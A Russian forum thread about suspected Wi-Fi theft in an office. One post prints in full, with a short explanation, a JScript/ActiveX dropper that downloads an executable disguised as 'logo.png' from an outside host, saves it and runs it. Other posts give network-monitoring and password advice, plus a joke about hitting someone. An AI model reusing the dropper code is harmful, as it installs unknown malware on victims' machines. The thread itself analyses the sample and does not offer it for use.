ДмитрийДёмин

Пытается загрузить файл по этой ссылке: http://ilyushchenko1...7ci.ru/logo.png, сохраняет его как исполняетмый файл во временную папку и запускает его. Хз даже что там дальше, некогда пока что. По ходу самый сок там.

Кстати, судя по тому что тут ActivX, то работать это будет только в IE и то если разрешить.

function dl(fr,url,ext) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random()*100000000) + ext;
    var fn = 'C:\\123.exe';
    
    var dn = 0;
    
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState == 4 && xo.status == 200) {
            var xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            if (xa.size > 0) {
                dn = 1;
                xa.position = 0;
                xa.saveToFile(fn,2);
                try {
                    ws.Run(fn,1,1);
                    //ws.Run("http://mail.ru/",1,1);
                }catch (er) {};
            };

            xa.close();
        };

    };

    try {
        xo.open("GET",url, false);
        xo.send();
    } catch (er) {};  
};  

dl('support@ssm.kz','http://ilyushchenko19771.7ci.ru/logo.png','.exe');

Берёшь nmap и куда-нибудь в планировщик задач забиваешь команду:

nmap.exe 192.168.1.0/24 >> results.txt

Ну и пущай каждый час отрабатывает, а ты потом сиди и читай ))

С другой стороны ну посмотришь ты кто в сети сидит, тебе легче станет? MAC узнать можно из списка, выдаваемого командной arp -a, а что дальше? Весь офис оббегать будешь и сверять мак-и? Т.е. это как бы незаметно, что что-то происходит и имеет смысл не пользоваться халявой некоторое время? С другой стороны, теоретически неизменняемый мак-адрес таковой только теоретически.

Опять же: меняй пароль на беспроводную сеть и пароли доступа к роутеру! Если нормальный пароль поставишь (символов 20 длинной, буквы различных регистров, цифры, специальные символы), то меньше недели подбирать не получиться (только если с паяльником кого-нибудь, знающего пароль, не подкараулят).

Но лучше всего найти в каком месте у вас интернет заходит и как он там контроллируется (если у вас это происходит на точке, которая вай-фай раздаёт, то это очень-очень, я бы даже сказал, крайне печально). Т.е. находите шлюз и там уже надо смотреть кто, когда, куда и сколько раз.

ЗЫЖ Ещё придумал: заходить к ним с фразой: есть мнение, что кто-то тырит наш интернет, разберитесь, вы же айтишники. Если не разбреруться - разрывать отношений за некомпетентность и все дела. Чем не наказание?!

Но лучше всего, зайти к ITшниками, вас обслуживающим, и прямо им сказать: вы нам надоели, мы отказываемся от ваших услуг, мы заведём себе своих айтишников с блек-джеком и куртизанками. Если адекватное начальство у них, то зайти через него и намекнуть на подозрение в нечистоплотности исполнителей.... Короче проще всего договориться или разосраться в хлам, на крайний случай глаз подбить (но несильно, чтобы без статьи).